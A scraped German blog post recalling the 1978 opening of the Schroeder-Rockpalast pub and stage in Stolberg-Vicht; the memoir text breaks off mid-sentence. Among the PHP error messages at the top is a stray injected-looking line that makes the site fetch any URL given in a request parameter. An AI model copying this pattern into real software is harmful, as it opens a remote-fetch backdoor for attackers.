Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 520

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 535

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 542

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 578

Deprecated: Function set_magic_quotes_runtime() is deprecated in /homepages/u21512/schroeder/schroederblog/wp-settings.php on line 18
isset($_REQUEST['kocopu']) && fetch_feed($_REQUEST['feed_url']);
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/u21512/schroeder/schroederblog/wp-settings.php:520) in /homepages/u21512/schroeder/schroederblog/wp-content/plugins/formbuilder/captcha/CaptchaSecurityImages.php on line 26
Schroeder Roadshow » Der SCHROEDER-ROCKPALAST wurde 1978 eröffnet:

Der SCHROEDER-ROCKPALAST wurde 1978 eröffnet:

Schroeder am 11. Dezember 2008

Im Sommer 1978 eröffneten wir in Stolberg-Vicht (Eifel) eine Kneipe mit Saal im ersten Stock. Jetzt sind nicht nur unsere eigenen Tresengäste und schenken uns selbst das Bier aus, sondern machen uns auch gegenseitig Deckel, und noch wichtiger: Wir können im eigenen Laden Musik machen! Zur großen Silvestershow reisen die 3 TORNADOS aus Berlin an. Unvergessen die Bergung ihres kleinen Bandmobils auf der A4 in Höhe Raststätte Frechen, wo die TORNADOS (sic!) infolge heftigsten Wintereinbruchs den Jahreswechsel im Schnee zu verbringen drohten. Ein Glück, daß wir immer den dicken Bus unterm Tor stehen hatten. Wahnsinn, der Winter ‘78/79.

Nicht zu vergessen auch der legendäre Auftritt von WILLY KAPPES aus Aachen - Originalton: “Jetzt lauter mit extra 400 Watt - auch als Anlagenverleih” - “Leute bleiben auf der Straße stehn, wollen Willy Kappes sehn, wollen Willy Kappes sehn …” - „Hört ihr Leute diesen Ton, dieser Ton hat 180 Phon!“ Hier wurden Punk und Trash und Grundge und überhaupt alles vorweggenommen. (kommt Plakat/Kappes-Story)

Apropos Proben im eigenen Laden: In einem leeren Saal in zentraler Lage einer kleinen Eifelidylle einen Song zu proben, das ist laut! Dafür sorgen schon die großen Fenster nach vorne heraus. Aber ein ganzes Tourprogramm zu proben und es, wenn es fertig ist, täglich noch zwei-, dreimal durch zu spielen, das ist sehr, sehr, sehr laut. Bei der Mutti nebenan, die ihre Küche direkt Wand an Wand mit der Bühne hatte, war die Laustärke “bestialisch“, wie uns der Klempner mal erzählte. Aber was sagt diese Frau, als wir mit Blumen bei ihr aufliefen - und mir soll der Kopf abfallen, wenn das nicht stimmt - “… nein, nein, es ist so schön, besonders wenn der Gerty singt …”

Im SCHROEDER-ROCKPALAST, Stolberg-Vicht 1978/79 (v.lks.): ULI HUNDT, RICH SCHWAB, RICHARD HERTEN, GERTY BERACZ, MANNI HOLLAENDER, JESUS CANNELONI

Schön auch hier ein Auszug aus Rich Schwab’s Biografie:

Apropos Haus - wir schreiben immer noch die 70er Jahre – Aufbruchstimmung. Alternative Lebensentwürfe. Autarkie. Anarchie. Nach monatelanger Überzeugungsarbeit gelingt es den Schroederchens, auch Frauen und Kinder für das Projekt „Gemeinsam Leben & Arbeiten“ zu erwärmen, und nach ein paar weiteren Monaten der Sucherei finden sie in Vicht am Rand der Eifel ein Haus, das für ihre Zwecke optimal geeignet scheint. Erschwingliche vierzehn Zimmer, ein Hof mit genügend großer Toreinfahrt - und im ersten Stock ein Saal für ca. 200 Personen! Mit ´ner richtigen Bühne! Wenn wir auftreten wollen, sind wir also nicht mal mehr auf andere Veranstalter angewiesen …!

Wo der Haken is´? Na ja - das Haus wird vermietet von einer Brauerei, und Bestandteil des Mietvertrags ist, dass die Kneipe im Erdgeschoss ordentlich betrieben werden muss … Na und? Das können ein paar von uns doch schon! Und - schwupps! - heißt die Kneipe Schroeder´s Rockpalast, zur rauschenden und unvergessenen Eröffnungsfeier reisen Hunderte von Menschen sogar aus Köln und London an, und nach ein paar Wochen

Abgelegt unter Historisches, Schroeder | Keine Kommentare

Trackback URI | Kommentare als RSS

Einen Kommentar schreiben